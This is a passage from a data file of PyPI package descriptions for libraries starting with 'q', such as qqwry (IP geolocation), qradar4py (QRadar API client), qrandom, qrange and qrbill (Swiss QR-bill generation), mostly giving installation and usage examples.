loadindex=False)\u51fd\u6570\u52a0\u8f7dqqwry.dat\u6587\u4ef6\u3002\u6210\u529f\u8fd4\u56deTrue\uff0c\u5931\u8d25\u8fd4\u56deFalse\u3002\u53c2\u6570filename\u53ef\u4ee5\u662fqqwry.dat\u7684\u6587\u4ef6\u540d\uff08str\u7c7b\u578b\uff09\uff0c\u4e5f\u53ef\u4ee5\u662fbytes\u7c7b\u578b\u7684\u6587\u4ef6\u5185\u5bb9\u3002\u5f53\u53c2\u6570loadindex=False\u65f6\uff08\u9ed8\u8ba4\u53c2\u6570\uff09\uff1a\u7a0b\u5e8f\u884c\u4e3a\uff1a\u628a\u6574\u4e2a\u6587\u4ef6\u8bfb\u5165\u5185\u5b58\uff0c\u4ece\u4e2d\u641c\u7d22\u52a0\u8f7d\u901f\u5ea6\uff1a\u5f88\u5feb\uff0c0.004 \u79d2\u8fdb\u7a0b\u5185\u5b58\uff1a\u8f83\u5c11\uff0c16.9 MB\u67e5\u8be2\u901f\u5ea6\uff1a\u8f83\u6162\uff0c5.3 \u4e07\u6b21/\u79d2\u4f7f\u7528\u5efa\u8bae\uff1a\u9002\u5408\u684c\u9762\u7a0b\u5e8f\u3001\u5927\u4e2d\u5c0f\u578b\u7f51\u7ad9\u5f53\u53c2\u6570loadindex=True\u65f6\uff1a\u7a0b\u5e8f\u884c\u4e3a\uff1a\u628a\u6574\u4e2a\u6587\u4ef6\u8bfb\u5165\u5185\u5b58\u3002\u989d\u5916\u52a0\u8f7d\u7d22\u5f15\uff0c\u628a\u7d22\u5f15\u8bfb\u5165\u66f4\u5feb\u7684\u6570\u636e\u7ed3\u6784\u52a0\u8f7d\u901f\u5ea6\uff1a\u2605\u2605\u2605\u975e\u5e38\u6162\uff0c\u56e0\u4e3a\u8981\u989d\u5916\u52a0\u8f7d\u7d22\u5f15\uff0c0.78 \u79d2\u2605\u2605\u2605\u8fdb\u7a0b\u5185\u5b58\uff1a\u8f83\u591a\uff0c22.0 MB\u67e5\u8be2\u901f\u5ea6\uff1a\u8f83\u5feb\uff0c18.0 \u4e07\u6b21/\u79d2\u4f7f\u7528\u5efa\u8bae\uff1a\u4ec5\u9002\u5408\u9ad8\u8d1f\u8f7d\u670d\u52a1\u5668\uff08\u4ee5\u4e0a\u662f\u5728i3 3.6GHz, Win10, Python 3.6.2 64bit\uff0cqqwry.dat 8.86MB\u65f6\u7684\u6570\u636e\uff09\u89e3\u91caq.lookup(\u20188.8.8.8\u2019)\u51fd\u6570\u627e\u5230\u5219\u8fd4\u56de\u4e00\u4e2a\u542b\u6709\u4e24\u4e2a\u5b57\u7b26\u4e32\u7684\u5143\u7ec4\uff0c\u5982\uff1a(\u2018\u56fd\u5bb6\u2019, \u2018\u7701\u4efd\u2019)\u6ca1\u6709\u627e\u5230\u7ed3\u679c\uff0c\u5219\u8fd4\u56de\u4e00\u4e2aNone\u89e3\u91caq.clear()\u51fd\u6570\u6e05\u7a7a\u5df2\u52a0\u8f7d\u7684qqwry.dat\u518d\u6b21\u8c03\u7528load_file\u65f6\u4e0d\u5fc5\u6267\u884cq.clear()\u89e3\u91caq.is_loaded()\u51fd\u6570q\u5bf9\u8c61\u662f\u5426\u5df2\u52a0\u8f7d\u6570\u636e\uff0c\u8fd4\u56deTrue\u6216False\u89e3\u91caq.get_lastone()\u51fd\u6570\u8fd4\u56de\u6700\u540e\u4e00\u6761\u6570\u636e\uff0c\u6700\u540e\u4e00\u6761\u901a\u5e38\u4e3a\u6570\u636e\u7684\u7248\u672c\u53f7\u6ca1\u6709\u6570\u636e\u5219\u8fd4\u56de\u4e00\u4e2aNone>>> q.get_lastone()\n('\u7eaf\u771f\u7f51\u7edc', '2020\u5e749\u670830\u65e5IP\u6570\u636e')\u4ece\u7eaf\u771f\u7f51\u7edc(cz88.net)\u66f4\u65b0qqwry.dat\u7684\u5c0f\u5de5\u5177>>> from qqwry import updateQQwry\n>>> ret = updateQQwry(filename)\u5f53\u53c2\u6570filename\u662fstr\u7c7b\u578b\u65f6\uff0c\u8868\u793a\u8981\u4fdd\u5b58\u7684\u6587\u4ef6\u540d\u3002\u6210\u529f\u540e\u8fd4\u56de\u4e00\u4e2a\u6b63\u6574\u6570\uff0c\u662f\u6587\u4ef6\u7684\u5b57\u8282\u6570\uff1b\u5931\u8d25\u5219\u8fd4\u56de\u4e00\u4e2a\u8d1f\u6574\u6570\u3002\u5f53\u53c2\u6570filename\u662fNone\u65f6\uff0c\u51fd\u6570\u76f4\u63a5\u8fd4\u56deqqwry.dat\u7684\u6587\u4ef6\u5185\u5bb9\uff08\u4e00\u4e2abytes\u5bf9\u8c61\uff09\u3002\u6210\u529f\u540e\u8fd4\u56de\u4e00\u4e2abytes\u5bf9\u8c61\uff1b\u5931\u8d25\u5219\u8fd4\u56de\u4e00\u4e2a\u8d1f\u6574\u6570\u3002\u8fd9\u91cc\u8981\u5224\u65ad\u4e00\u4e0b\u8fd4\u56de\u503c\u7684\u7c7b\u578b\u662fbytes\u8fd8\u662fint\u3002\u8d1f\u6574\u6570\u8868\u793a\u7684\u9519\u8bef\uff1a-1\uff1a\u4e0b\u8f7dcopywrite.rar\u65f6\u51fa\u9519-2\uff1a\u89e3\u6790copywrite.rar\u65f6\u51fa\u9519-3\uff1a\u4e0b\u8f7dqqwry.rar\u65f6\u51fa\u9519-4\uff1aqqwry.rar\u6587\u4ef6\u5927\u5c0f\u4e0d\u7b26\u5408copywrite.rar\u7684\u6570\u636e-5\uff1a\u89e3\u538b\u7f29qqwry.rar\u65f6\u51fa\u9519-6\uff1a\u4fdd\u5b58\u5230\u6700\u7ec8\u6587\u4ef6\u65f6\u51fa\u9519Featuresfor Python 3.0+.Provide two sets of implementations for selection. One finds faster, but loads slowly and takes up more memory.The query speed on i3 3.6GHz and Python 3.6 is 180,000 times per second.Provide a small tool to update qqwry.dat from Chunzhen Network (cz88.net), see the last part of this article for usage.usage>>> from qqwry import QQwry\n>>> q = QQwry()\n>>> q.load_file('qqwry.dat')\n>>> q.lookup('8.8.8.8')\n('United States','Google DNS server in Mountain View, Santa Clara County, California')Explain the q.load_file(filename, loadindex=False) functionLoad the qqwry.dat file. Return True on success, False on failure.The parameter filename can be the file name of qqwry.dat (str type), or the file content of bytes type.When the parameter loadindex=False (default parameter):Program behavior: read the entire file into memory, search from itLoading speed: very fast, 0.004 secondsProcess memory: less, 16.9 MBQuery speed: slower, 53,000 times per secondSuggestions for use: suitable for desktop programs, large, medium and small websitesWhen the parameter loadindex=True:Program behavior: Read the entire file into memory. Load an additional index, read the index into a faster data structureLoading speed: \u2605\u2605\u2605Very slow, because of the additional loading index, 0.78 seconds\u2605\u2605\u2605Process memory: more, 22.0 MBQuery speed: faster, 180,000 times per secondRecommendations for use: only suitable for high-load servers(The above is the data when i3 3.6GHz, Win10, Python 3.6.2 64bit, qqwry.dat 8.86MB)Explain the q.lookup(\u20188.8.8.8\u2019) functionIf found, return a tuple containing two strings, such as: (\u2018country\u2019,\u2019province\u2019)If no result is found, a None is returnedExplain the q.clear() functionClear the loaded qqwry.datIt is not necessary to execute q.clear() when calling load_file againExplain the q.is_loaded() functionWhether the q object has loaded data, return True or FalseExplain the q.get_lastone() functionReturn the last piece of data, the last piece is usually the version number of the dataReturn None if there is no data>>> q.get_lastone()\n('\u7eaf\u771f\u7f51\u7edc', '2020\u5e749\u670830\u65e5IP\u6570\u636e')Update the widget of qqwry.dat from Chunzhen Network (cz88.net)>>> from qqwry import updateQQwry\n>>> ret = updateQQwry(filename)When the parameter filename is of type str, it indicates the name of the file to be saved.Upon success, it returns a positive integer, which is the number of bytes in the file;Upon failure, it returns a negative integer.When the parameter filename is None, the function directly returns the content of the qqwry.dat file (a bytes object).Return a bytes object on success; return a negative integer on failure. Here to determine whether the type of the return value is bytes or int.Errors represented by negative integers:-1: An error occurred while downloading copywrite.rar-2: Error when parsing copywrite.rar-3: An error occurred when downloading qqwry.rar-4: qqwry.rarfile size does not match the data of copywrite.rar-5: Error when decompressing qqwry.rar-6: An error occurred while saving to the final file"} +{"package": "qr", "pacakge-description": "Full documentation(with example code) is at (http://github.com/tnm/qr/)QRQRhelps you create and work withqueue, capped collection (bounded queue),\ndeque, and stackdata structures forRedis. Redis is well-suited for\nimplementations of these abstract data structures, and QR makes it even easier to\nwork with the structures in Python.Quick SetupYou\u2019ll need Redis (http://github.com/antirez/redis/) itself (QR makes use\nof MULTI/EXEC, so you\u2019ll need the Git edge version), and the current Python interface\nfor Redis, redis-py, (http://github.com/andymccurdy/redis-py). Putqr.pyin your PYTHONPATH and you\u2019re all set."} +{"package": "qr2022", "pacakge-description": "No description available on PyPI."} +{"package": "qr2cnc", "pacakge-description": "UNKNOWN"} +{"package": "qr2scad", "pacakge-description": "qr2scad package"} +{"package": "qr2text", "pacakge-description": "Convert SVG images containing barcodes generated by PyQRCode to ASCII art,\nfor displaying in a terminal.Because I\u2019m a weird person who reads mail using Mutt over SSH in a terminal,\nand sometimes people send me QR codes for setting up TOTP authentication.Example:$ python3\n>>> import pyqrcode\n>>> qr = pyqrcode.create('Hello world!')\n>>> qr.svg('hello.svg')\n\n$ qr2text --white-background hello.svg\n\n\n \u2588\u2580\u2580\u2580\u2580\u2580\u2588 \u2580\u2584\u2588\u2584\u2580\u2584\u2580\u2580\u2584 \u2588\u2580\u2580\u2580\u2580\u2580\u2588\n \u2588 \u2588\u2588\u2588 \u2588 \u2580 \u2588\u2584 \u2588 \u2588 \u2588\u2588\u2588 \u2588\n \u2588 \u2580\u2580\u2580 \u2588 \u2580\u2580\u2584\u2584\u2580 \u2580 \u2584 \u2588 \u2580\u2580\u2580 \u2588\n \u2580\u2580\u2580\u2580\u2580\u2580\u2580 \u2588\u2584\u2588\u2584\u2580\u2584\u2580\u2584\u2580 \u2580\u2580\u2580\u2580\u2580\u2580\u2580\n \u2584\u2584\u2584\u2584\u2580\u2580 \u2584\u2580\u2584\u2580\u2588\u2588\u2580\u2580\u2580 \u2580\u2584\u2588\u2584\u2580 \u2580\n \u2580\u2580\u2580\u2580\u2580\u2584\u2580\u2580\u2584\u2580\u2584\u2580\u2584 \u2580\u2580\u2588\u2580\u2584 \u2580\u2588 \u2588\u2588\n \u2584\u2588\u2580\u2584\u2580 \u2580\u2580\u2584 \u2584\u2588\u2588\u2584\u2580 \u2580\u2584 \u2588\u2584 \u2580\n \u2588 \u2584 \u2580\u2580\u2580\u2588\u2584 \u2588\u2588\u2580\u2588\u2580\u2588\u2588\u2580\u2588\u2584\u2580\u2588\n \u2580 \u2580 \u2580\u2580\u2580\u2584\u2588\u2584\u2580\u2584\u2588\u2580\u2580\u2588\u2580\u2580\u2580\u2588\u2588\u2588 \u2584\n \u2588\u2580\u2580\u2580\u2580\u2580\u2588 \u2584 \u2588\u2580\u2584\u2580\u2588\u2588 \u2580 \u2588 \u2588\n \u2588 \u2588\u2588\u2588 \u2588 \u2588\u2580\u2584 \u2584 \u2580\u2580\u2588\u2580\u2580\u2580\u2588\u2580\u2584\n \u2588 \u2580\u2580\u2580 \u2588 \u2584\u2580\u2580\u2580\u2580 \u2580 \u2584\u2588\u2584\u2588 \u2588\n \u2580\u2580\u2580\u2580\u2580\u2580\u2580 \u2580 \u2580\u2580 \u2580\u2580 \u2580 \u2580 \u2580\n\n\nHello world!Note: you may have to tell qr2text whether your terminal is black-on-white\n(\u2013white-background) or white-on-black (\u2013black-background). Some QR code\nscanners don\u2019t care, but others will refuse to recognize inverted QR codes.Note: for QR code decoding to work you need to have libzbar installed on your\nsystem (e.g.sudo apt install libzbar0on Ubuntu).Synopsis:usage: qr2text [-h] [--version] [--black-background] [--white-background]\n [--big] [--trim] [--pad PAD] [--decode] [--no-decode]\n [--encode-text ENCODE_TEXT]\n [filename ...]\n\nConvert PyQRCode SVG images to ASCII art\n\npositional arguments:\n filename SVG file with the QR code (use - for stdin)\n\noptions:\n -h, --help show this help message and exit\n --version show program's version number and exit\n --black-background terminal is white on black (default)\n --white-background, --invert\n terminal is black on white\n --big use full unicode blocks instead of half blocks\n --trim remove empty border\n --pad PAD pad with empty border\n --decode decode the QR codes (default if libzbar is available)\n --no-decode don't decode the QR codes\n --encode-text ENCODE_TEXT\n generate a QR code with given text"} +{"package": "qr3", "pacakge-description": "Full documentation (with example code) is athttp://github.com/doctorondemand/qr3QR3QR3helps you create and work withqueue, capped collection (bounded queue),\ndeque, and stackdata structures forRedis. Redis is well-suited for\nimplementations of these abstract data structures, and QR3 makes it even easier to\nwork with the structures in Python.Quick SetupYou\u2019ll need [Redis](http://github.com/antirez/redis/\u201cRedis\u201d) itself (QR makes use\nof MULTI/EXEC, so you\u2019ll need the Git edge version), and the current Python interface\nfor Redis, [redis-py](http://github.com/andymccurdy/redis-py\u201credis-py\u201d).Run setup.py to install qr3 or \u2018pip install qr3\u2019.Responding to PR\u2019sGiven that this package primarily supports internal use cases, we cannot guarantee a\nspecific response time on PRs for new features. However, we will do our best to\nconsider them in a timely fashion.We do commit to reviewing anything related to a security issue in a timely manner.\nWe ask that you first submit anything of that nature tosecurity@doctorondemand.comprior to creating a PR and follow responsible disclosure rules.Thanks for your interest in helping with this package!"} +{"package": "qradar4py", "pacakge-description": "QRadar API Client written in PythonThis is a wrapper around the REST-API of QRadar. This includes some undocumented endpoints, that may not work as expected.All the information for the various endpoints were pulled from version13.1.If you find any bugs please open an issue or a pull request.A word of warningqradar4py is work in progress and should be treated as a software in beta, especially regarding the \"undocumented\" API endpoints.Installationsudopip3installqradar4py# ORcdqradar4py&&sudopython3setup.pyinstallUsageJust a very basic sample on how to get the IDs of up to 10 offenses that are not closed.fromqradar4py.apiimportQRadarApi# Initalize the API with the URL, your API token and whether the certificate should be checked.api=QRadarApi(\"\",\"\",version='13.1',verify=True)# Get all offensesstatus_code,response=api.siem.get_offenses(filter='status != CLOSED',Range='items=0-50',fields='id')print(status_code,response)# 200 [{'id': 1}, {'id': 2}, {'id': 3}, {'id': 4}, {'id': 5}]MappingCheck the \"Interactive API\" on QRadar to see what endpoints are available in your version.Check thedocumentationto get a mapping from endpoint to method.DisclaimerI am in no way affiliated with IBM.QRadar is a registered trademark by IBM."} +{"package": "qradar-api", "pacakge-description": "qradar-apiThis package contains an object oriented approach to the QRadar API. The idea is to keep the logic simple, structure and allow for an easy way to integrate with the QRadar API.This package was inspired by:https://github.com/ryukisec/qradar4pywho already put in some ground work when it came to an object oriented approach.\nThis package goes further and adds models for the different object you can retrieve and post.It is a work in progress though :)Structurethe package containsEndpointsInherit from base classQRadarAPIClientUse decorators to define which headers and parameters are allowed for each endpointlocated in src\\qradar\\api\\endpointsModelsInherit from base classQRadarModel, which provides them with a custom__repr__andfrom_json()factoryLocated in src\\qradar\\modelsInstallationsudopip3installqradar-apiHow to useRoadmapSet up decent packaging :package:Fix typing for ease-of-useImplement all models & GET endpoints :rocket:Implement all post endpoints :pencil:Convince IBM to contribute when creating a new API version :pray:Write a nice set of unit tests :clown_face:"} +{"package": "qradial-menu", "pacakge-description": "No description available on PyPI."} +{"package": "qrainbowstyle", "pacakge-description": "QRainbowStyle is a fully customizable stylesheet for Python and Qt applications.This module provides a function to load pre-compiled stylesheets. To generate your own\nstyle based on custom color palette clone package from project homepage.qrainbowstyle.windows module adds frameless windows and message boxes.\nFrom version v0.8 module supports native Windows calls.\nFeatures:Borders snappingMinimize, restore, close animationsSize grips on bordersFrame shadowAero shakeOn Linux and Darwin qrainbowstyle will load class with its own implementation of these features.\nDue to a bug in Qt, window minimizing is not supported on MacOS.First, start importing our moduleimportqrainbowstyleThen you can get stylesheet provided by QRainbowStyle for various Qt wrappers\nas shown below# PySide2stylesheet=qrainbowstyle.load_stylesheet_pyside2(style='oceanic')# PyQt5stylesheet=qrainbowstyle.load_stylesheet_pyqt5(style='oceanic')Alternatively, from environment variables provided by QtPy, Qt.Py# QtPystylesheet=qrainbowstyle.load_stylesheet(style='oceanic')# Qt.Pystylesheet=qrainbowstyle.load_stylesheet(style='oceanic',qt_api=Qt.__binding__)Finally, set your QApplication with itapp.setStyleSheet(stylesheet)To load frameless window in your app import both qrainbowstyle and qrainbowstyle.windows modulesimportqrainbowstyleimportqrainbowstyle.windowsInitialize qt app and load choosen stylesheet.\nNext, create instances of frameless window and your master widget with content you want to show.# Create app and load selected stylesheetapp=QtWidgets.QApplication(sys.argv)app.setStyleSheet(qrainbowstyle.load_stylesheet(style=\"oceanic\"))# Package options# qrainbowstyle.alignButtonsLeft() # align titlebar buttons to left side# qrainbowstyle.useDarwinButtons() # use darwin style buttonsqrainbowstyle.setAppName(\"My new application\")# set global name for application# qrainbowstyle.setAppIcon(\"icon.ico\") # set global app icon# Create frameless mainwindowwin=qrainbowstyle.windows.FramelessWindow()# Create content widget and pass reference to main windowwidget=MasterWidget(win)# Add widget to main window and show itwin.addContentWidget(widget)win.show()sys.exit(app.exec())Enjoy!"} +{"package": "qram", "pacakge-description": "No description available on PyPI."} +{"package": "qrand", "pacakge-description": "qrandA multiprotocol and multiplatform quantum random number generation frameworkRandom numbers are everywhere.Computer algorithms, data encryption, physical simulations, and even the arts use them all the time. There is one problem though: it turns out that they are actually very difficult to produce in large amounts. Classical computers can only implement mathematical tricks to emulate randomness, while measuring it out of physical processes turns out to be too slow. Luckily, the probabilistic nature of quantum computers makes these devices particularly useful for the task.QRAND is a free and open-source framework for quantum random number generation. Thanks to its loosely coupled design, it offers seamlessly compatibility between differentquantum computing platformsandQRNG protocols. Not only that, but it also enables the creation of custom cross-compatible protocols, and a wide range of output formats (e.g. bitstring, int, float, complex, hex, base64).To boost its efficiency, QRAND makes use of a concurrent cache to reduce the number of internet connections needed for random number generation; and for quality checks, it incorporates a suite of classical entropy validation tests which can be easily plugged into any base protocol.Additionally, QRAND introduces an interface layer forNumPythat enables the efficient production of quantum random numbers (QRN) adhering to a wide variety of probability distributions. This is ultimately accomplished by transforming uniform probability distributions produced in cloud-based real quantum hardware, through NumPy's random module.fromqrandimportQuantumBitGeneratorfromqrand.platformsimportQiskitPlatformfromqrand.protocolsimportHadamardProtocolfromnumpy.randomimportGeneratorfromqiskitimportIBMQprovider=IBMQ.load_account()platform=QiskitPlatform(provider)protocol=HadamardProtocol()bitgen=QuantumBitGenerator(platform,protocol)gen=Generator(bitgen)print(f\"Random Raw:{bitgen.random_raw()}\")print(f\"Random Bitstring:{bitgen.random_bitstring()}\")print(f\"Random Unsigned Int:{bitgen.random_uint()}\")print(f\"Random Double:{bitgen.random_double()}\")print(f\"Random Binomial:{gen.binomial(4,1/4)}\")print(f\"Random Exponential:{gen.exponential()}\")print(f\"Random Logistic:{gen.logistic()}\")print(f\"Random Poisson:{gen.poisson()}\")print(f\"Random Std. Normal:{gen.standard_normal()}\")print(f\"Random Triangular:{gen.triangular(-1,0,1)}\")# ...Supported quantum platformsAs of May 2021, onlyQiskitis supported. However, support forCirqandQ#is under active development.Implemented QRNG protocolsAs of May 2021, only the basicHadamardProtocolis available. We are also working on implementing thisEntaglementProtocol, as well as a version ofGoogle's Sycamore routine(patent permitting).Authors and citationQRAND is the work of many people who contribute to the project at\ndifferent levels. If you use QRAND, please cite as per the includedBibTeX file.Contribution guidelinesIf you'd like to contribute to QRAND, please take a look at thecontribution guidelines. This project adheres to the followingcode of conduct. By participating, you are expected to uphold this code.We useGitHub issuesfor tracking requests and bugs. Please use Unitary Fund'sDiscordfor discussion and simple questions.AcknowledgementsParts of this software's source code have been borrowed from theqRNGproject, which is licensed under theGNU GPLv3license. Copyright notice and specific changes can be found as a docstring wherever this applies.LicenseApache License 2.0(c) Copyright 2021 Pedro Rivero"} +{"package": "qrandom", "pacakge-description": "QrandomSelectionThis repository contains the source code of research paper titled: \" A generalized quantum algorithm for assuring fairness in random selection among 2nparticipants\". Research paper is published in SN Computer Science Springer Nature Journal, 14th march 2020.Paper Title: A Generalized Quantum Algorithm for Assuring Fairness in Random Selection Among 2NParticipantsAuthor:Ravin KumarPublication: 14th March 2020Publication Link:https://link.springer.com/article/10.1007/s42979-020-0091-zDoi:https://doi.org/10.1007/s42979-020-0091-zCite as:Kumar, R. A Generalized Quantum Algorithm for Assuring Fairness in Random Selection Among 2N Participants. \nSN COMPUT. SCI. 1, 86 (2020). https://doi.org/10.1007/s42979-020-0091-zQiskit Version:qiskit-terra version: 0.7.0qiskit-aqua version: 0.4.1Create quantum circuit for 'N' participantsOur module provides a direct method for creating quantum circuit for 'n' participants.importqrandomres=qrandom.select(8)### here 8 is total number of participants.Visualization of quantum circuitA simple method is given to save the pictorial repreentation of quantum circuit for 'n' participants.importqrandomchk=qrandom.vis_circuit(8,\"file_name.png\")### it saves the generalized quantum circuit for 8 participants in file_name.png file.Installing module using PyPi:pipinstallqrandomCopyright(c)2018RavinKumarWebsite:https://mr-ravin.github.ioPermissionisherebygranted,freeofcharge,toanypersonobtainingacopyofthissoftwareandassociateddocumentationfiles(the\u201cSoftware\u201d),todealintheSoftwarewithoutrestriction,includingwithoutlimitationtherightstouse,copy,modify,merge,publish,distribute,sublicense,and/orsellcopiesoftheSoftware,andtopermitpersonstowhomtheSoftwareisfurnishedtodoso,subjecttothefollowingconditions:TheabovecopyrightnoticeandthispermissionnoticeshallbeincludedinallcopiesorsubstantialportionsoftheSoftware.THESOFTWAREISPROVIDED\u201cASIS\u201d,WITHOUTWARRANTYOFANYKIND,EXPRESSORIMPLIED,INCLUDINGBUTNOTLIMITEDTOTHEWARRANTIESOFMERCHANTABILITY,FITNESSFORAPARTICULARPURPOSEANDNONINFRINGEMENT.INNOEVENTSHALLTHEAUTHORSORCOPYRIGHTHOLDERSBELIABLEFORANYCLAIM,DAMAGESOROTHERLIABILITY,WHETHERINANACTIONOFCONTRACT,TORTOROTHERWISE,ARISINGFROM,OUTOFORINCONNECTIONWITHTHESOFTWAREORTHEUSEOROTHERDEALINGSINTHESOFTWARE."} +{"package": "qrandom-NoahGWood", "pacakge-description": "QRandomRandom number generation using quantum computers.Right now the project is in its' infancy.WARNING: THIS PROGRAM SHOULD NOT BE CONSIDERED CRYPTOGRAPHICALLY RANDOM UNLESS CONNECTED TO A REAL QUANTUM PROCESSORThis is a basic example of how to use QRandomYou can import everythingfrom qrandom import *or just the QRandom module if you'd like to instantiate it yourselffrom qrandom import Qrandom\nx = QRandom()generate a random float between 0 and 1:print(random())\nprint(x.random())generate a random integer in rangeprint(randrange(0, 5))\nprint(x.randrange(0, 5))Generate a random number n bits long, defaults to integer outputprint(getrandbits(8))\nprint(x.getrandbits(8))You can also get the number in byte formatprint(getrandbits(8, x=\"bytes\"))"} +{"package": "q-random-number-generator", "pacakge-description": "q_random_number_generatorDescriptionUsing qiskit to realize quantum random number generator.Exampleimportq_randon_number_generatorasqrngrandom_int=qrng.randint(-10,10,1000)AuthorAllen Wu"} +{"package": "qrange", "pacakge-description": "qrangeA small, easy-to-use library for working with ranges.InstallationThis package can be installed with the command:pip install qrangeHow to useUse qrange in your project by adding the following line at the top of your file:import qrangeThis library provides a set of functions for making it easier to work with ranges:set_min_max(x, min_max, min_max_new): Takes anxthat's betweenmin_max[0]andmin_max[1], and changes the limits tomin_max_new[0]andmin_max_new[1]. Example usage:color=[128,0,0]color[0]=set_min_max(color[0],[0,255],[0,1])#converts 0-255 color to 0-1 color range.reverse_range(x, min_max): Reverses anxvalue in amin_maxrange. Suppose you have asoftnessvariable, but you made the program so that the higher the softness is, the harder it gets.reverse_rangecan fix that for you:softness=reverse_range(softness,[0,10])# If the variable was 0, this function made it 10.# similarly, if it had a value of 10, it is now 0.is_in_range(x, min_max, limits = ['c', 'c']): Checks if anxvalue is betweenmin_max[0]andmin_max[1]. The limits of the range are closed by default, so ifxis equal to one of them, the function returnsTrue. However, you can choose betweencando(closed/open) for each one of the two limits.\nAn example:isBetween=is_in_range(var,[25,75])range_lerp(min_max, t): Returns the linear interpolation betweenmin_max[0]andmin_max[1]. The following line prints the value halfway between 1 and 5:print(range_lerp([1,5],0.5))# outputs 3find_lerp(x, min_max): returns the correspondingtvalue (between 0 and 1) of anxvalue betweenmin_max[0]andmin_max[1]. Consider the following examples:print(find_lerp(5,[5,10]))#outputs 0print(find_lerp(10,[5,10]))#outputs 1print(find_lerp(8,[5,10]))#outputs 0.6clamp(x, min_max): Restricts the value to stay within the limitsmin_max[0]andmin_max[1].var=clamp(var,[25,75])ChangelogVersion 1.0.0qrange has been createdAbout the authorHi! I am a solo software developer. I createdqrangeas an open source library to simplify the process of using ranges in Python. Check out myother repositoriesas well.\nIf you want to support me, pleasebuy me a coffee here. Any amount is appreciated! :)"} +{"package": "qrangeslider", "pacakge-description": "QRangeSliderThu Apr 28 00:08:07 PDT 20111 OverviewThe QRangeSlider class implements a horizontal PyQt range slider widget.README this fileLICENSE the license under which QRangeSlider is releasedqrangeslider.py qrangeslider python moduleexamples.py some usage examples2 Installation$ sudo easy_install qrangeslideror download the source and run$ sudo python setup.py install3 Basic Usage>>> from qrangeslider import QRangeSlider\n>>> app = QtGui.QApplication(sys.argv)\n>>> slider = QRangeSlider()\n>>> slider.show()\n>>> app.exec_()"} +{"package": "qr-asterix", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qrbill", "pacakge-description": "Python library to generate Swiss QR-billsFrom 2020, Swiss payment slips will progressively be converted to the\nQR-bill format.\nSpecifications can be found onhttps://www.paymentstandards.ch/This library is aimed to produce properly-formatted QR-bills as SVG files\neither from command line input or by using theQRBillclass.InstallationYou can easily install this library with:$ pip install qrbillCommand line usage exampleMinimal:$ qrbill --account \"CH5800791123000889012\" --creditor-name \"John Doe\"\n --creditor-postalcode 2501 --creditor-city \"Biel\"More complete:$ qrbill --account \"CH44 3199 9123 0008 8901 2\" --reference-number \"210000000003139471430009017\"\n--creditor-name \"Robert Schneider AG\" --creditor-street \"Rue du Lac 1268\"\n--creditor-postalcode \"2501\" --creditor-city \"Biel\"\n--additional-information \"Bill No. 3139 for garden work and disposal of cuttings.\"\n--debtor-name \"Pia Rutschmann\" --debtor-street \"Marktgasse 28\" --debtor-postalcode \"9400\"\n--debtor-city \"Rorschach\" --language \"de\"For usage:$ qrbill -hIf no\u2013outputSVG file path is specified, the SVG file will be named after\nthe account and the current date/time and written in the current directory.Note that if you don\u2019t like the automatic line wrapping in the human-readable\npart of some address, you can replace a space by a newline sequence in the\ncreditor or debtor name, line1, line2, or street to force a line break in the\nprinted addresses.\n(e.g.\u2013creditor-street \u201cRue des Quatorze Contours du Cheminndu Creux du Van\u201d)\nThe data encoded in the QR bill willnothave the newline character. It will\nbe replaced by a regular space.Python usage example>>> from qrbill import QRBill\n>>> my_bill = QRBill(\n account='CH5800791123000889012',\n creditor={\n 'name': 'Jane', 'pcode': '1000', 'city': 'Lausanne', 'country': 'CH',\n },\n amount='22.45',\n )\n>>> my_bill.as_svg('/tmp/my_bill.svg')Outputting as PDF or bitmapIf you want to produce a PDF version of the resulting bill, we suggest using thesvglib library. It can be used on the\ncommand line with thesvg2pdfscript, or directly from Python:>>> import tempfile\n>>> from qrbill import QRBill\n>>> from svglib.svglib import svg2rlg\n>>> from reportlab.graphics import renderPDF\n\n>>> my_bill = QRBill(\n account='CH5800791123000889012',\n creditor={\n 'name': 'Jane', 'pcode': '1000', 'city': 'Lausanne', 'country': 'CH',\n },\n amount='22.45',\n )\n>>> with tempfile.TemporaryFile(encoding='utf-8', mode='r+') as temp:\n>>> my_bill.as_svg(temp)\n>>> temp.seek(0)\n>>> drawing = svg2rlg(temp)\n>>> renderPDF.drawToFile(drawing, \"file.pdf\")or to produce a bitmap image output:>>> from reportlab.graphics import renderPM\n>>> dpi = 300\n>>> drawing.scale(dpi/72, dpi/72)\n>>> renderPM.drawToFile(drawing, \"file.png\", fmt='PNG', dpi=dpi)Running testsYou can run tests either by executing:$ python tests/test_qrbill.pyor:$ python setup.py testSponsorsChangeLog1.1.0 (2023-12-16)Add Arial font name in addition to Helvetica for better font fallback on some\nsystems.Drop support for Python < 3.8, and add testing for Python 3.11 and 3.12.1.0.0 (2022-09-21)BREAKING: Removed thedue-datecommand line argument and thedue_dateQRBill init kwarg, as this field is no longer in the most recent specs (#84).Handle line breaks in additional information, so it is showing in the printed\nversion, but stripped from the QR data (#86).Improved performance by deactivating debug mode in svgwrite (#82).0.8.1 (2022-05-10)Fixed a regression where the currency was not visible in the payment part\n(#81).0.8.0 (2022-04-13)Replaced##with//as separator in additional informations (#75).Print scissors symbol on horizontal separation line when not in full page.\nWARNING: the resulting bill is 1 millimiter higher to be able to show the\nentire symbol (#65).Renamed--extra-infoscommand line parameter to--additional-informationand renamedextra_infosandref_numberQRBill.__init__arguments\ntoadditional_informationandreference_number, respectively.\nThe old arguments are still accepted but raise a deprecation warning (#68).0.7.1 (2022-03-07)Fixed bad position of amount rect on receipt part (#74).Increased title font size and section spacing on payment part.0.7.0 (2021-12-18)License changed from GPL to MIT (#72).Prevented separation line filled on some browsers.Scissors symbol is now an SVG path (#46).0.6.1 (2021-05-01)Added--versioncommand-line option.QR-code size is now more in line with the specs, including the embedded Swiss\ncross (#58, #59).Widen space at the right of the QR-code (#57).A new--font-factorcommand-line option allows to scale the font if the\nactual size does not fit your needs (#55).0.6.0 (2021-02-11)Added the possibility to include newline sequences in name, street, line1, or\nline2 part of addresses to improve printed line wrapping of long lines.Moved QR-code and amount section to better comply with the style guide (#52).Dropped support for EOL Python 3.5 and confirmed support for Python 3.9.0.5.3 (2021-01-25)Enforced black as swiss cross background color.Allowed output with extension other than .svg (warning instead of error).Split long address lines to fit in available space (#48).0.5.2 (2020-11-17)Final creditor is only for future use, it was removed from command line\nparameters.Capitalized Helvetica font name in code (#43).The top line was printed a bit lower to be more visible (#42).0.5.1 (2020-08-19)Fix for missing country field in QR code when using CombinedAddress (#31).Added support for printing bill to full A4 format, using thefull_pageparameter 